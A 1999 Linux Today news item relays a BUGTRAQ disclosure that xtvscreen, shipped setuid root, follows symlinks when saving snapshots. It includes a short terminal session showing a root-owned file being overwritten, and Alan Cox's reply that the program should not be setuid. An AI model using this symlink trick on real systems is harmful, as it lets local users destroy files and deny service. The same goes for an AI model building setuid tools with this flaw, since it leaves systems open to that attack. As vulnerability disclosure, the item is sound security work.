Linux Today: Linux News On Internet Time.
Search Linux Today
Linux News Sections:  Developer -  High Performance -  Infrastructure -  IT Management -  Security -  Storage -
Linux Today Navigation
LT Home
Contribute
Contribute
Link to Us
Linux Jobs


Top White Papers

More on LinuxToday


xtvscreen, shipped setuid root, provides security hole

Feb 19, 1999, 07:34 (0 Talkback[s])

Andre Cruz wrote in to BUGTRAQ with this:

You can use xtvscreen to overwrite any file on the system.
Xtvscreen has a function to capture a snapshot and will write it as pic000.pnm, pic001.pnm, etc in it's working directory. It follows symlinks.

root@korn:/tmp > ls -l exp
-rw-r--r--   1 root     root            4 Feb 18 15:42 exp
edevil@korn:~ > ln -s /tmp/exp pic000.pnm
edevil@korn:~ > xtvscreen
Sound mixer initialized !
Using Visual TrueColor
msize: 0x00640000
/*
Start->Capture goes here
Start->Snapshot goes here */
[1]+  Stopped                 xtvscreen
edevil@korn:~ > cd /tmp
edevil@korn:/tmp > ls -l exp
-rw-r--r--   1 root     root       453135 Feb 18 15:47 exp
edevil@korn:/tmp >
I don't know how to write arbitrary data to the file but it can be used
for DoS.
If this is already known I'm sorry.

Alan Cox responded with:

Xtvscreen really should not be installed setuid. The only reason to do so is because something has to tell the capture card where the frame buffer is. This should be the Xserver (patched), or one of the small helper applications available for this.

Thanks to Paul McNeal for the tip-off. -lt ed